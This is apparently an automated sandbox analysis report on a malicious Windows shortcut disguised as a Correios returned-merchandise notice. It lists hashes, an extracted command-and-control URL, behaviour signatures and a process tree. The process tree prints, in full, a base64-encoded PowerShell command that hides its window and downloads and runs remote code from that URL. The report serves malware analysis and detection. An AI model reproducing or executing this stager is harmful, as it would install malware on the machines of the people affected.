Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
03-06-2024 12:00
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
Resource
win10v2004-20240426-en
General
-
Target
Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2808 powershell.exe 6 2808 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2808 powershell.exe 2808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2808 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2912 wrote to memory of 2808 2912 cmd.exe 29 PID 2912 wrote to memory of 2808 2912 cmd.exe 29 PID 2912 wrote to memory of 2808 2912 cmd.exe 29 PID 2808 wrote to memory of 2664 2808 powershell.exe 30 PID 2808 wrote to memory of 2664 2808 powershell.exe 30 PID 2808 wrote to memory of 2664 2808 powershell.exe 30 PID 2664 wrote to memory of 2396 2664 csc.exe 31 PID 2664 wrote to memory of 2396 2664 csc.exe 31 PID 2664 wrote to memory of 2396 2664 csc.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agowh6in.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1594.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1593.tmp"4⤵PID:2396
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f8e6cf91b503bd87acfa3d23c5e97fbe
SHA1931f606e1509ccea0c2d8009fe2fbb3345f1b52e
SHA256b1dfd802bdc5d9349df2ae4975af0ba3596a644317aff2f02a0ff8ec6cb7e3bb
SHA5127f0238ca0c7d448a6bd398b54711f563275cdc82fa8b935b69269d83b085a73f0c5275ab637fe587703293ec5fd4010df2278ef2345a86357e961dc8de9c7c25
-
Filesize
3KB
MD5fa4f288d7f2f3e7e14b1163dd8cb405f
SHA1e0158844f61b8080d3fcb579e2fd93b000a6be62
SHA2562fc9904f574d4a60bd342c520d98e886f9cd9b2c2c66b374855c11a282ef52fd
SHA512a88cbd2f0636764ae35a947cf2f472c123d3886e492db052b4cb68b5e087ae368000f2b4d895eea4028618c512f0edb6a273b79266537b433ac2ad08fce6e2f1
-
Filesize
7KB
MD5fe9e2d9c0380066d48d9204dfad05a40
SHA155be776084a9a123634f3035a4490ed0516fb25b
SHA25625434f644594800218e95244e8cbc3cb8a114881fb7e8f2acf5f9bce52525cdc
SHA512a8cf1e248d4189ca605d4f540610f8646fcc4d4bfdc3f84e5cef77c4732cb9ab8d5d85156b3ff0e454db2fa251ca9d560c67f4b2b275144fce8e6a6729c7e973
-
Filesize
652B
MD506b749a48318b88e9fe4a103f2127872
SHA1557a12be267032c2c60bb2c95c38c6138fd8a5f7
SHA2565f2dcd93dc03fb60f8f0fe6a5e71be56f7c2fd68fa07f753f609d6c309d1574e
SHA5129233efd7d4001737cc5b9c079f8892d0b31861b0db4191e6ce4de1141cc15b801f999f7210dae7310c8f1c20d0d2be12ed4d39ea07912db09e73c28ca3443199
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
309B
MD5dd3ca3afd2053888e49366e486b0c019
SHA12415e38683aff17c9df3dcaadde40938e0c974f1
SHA256122b6e87462f8d871b266c0312737e9ab44d67b97529a364602203403cbd6036
SHA5121d2bc3efa890282f2b5ae58083f64705e08fdc6bc2cc4cef37eed3ce36c7ebbf30376439fadedd3d019a4bf5a8418af6c7703ce8c2fd821e2c976a6c7d778249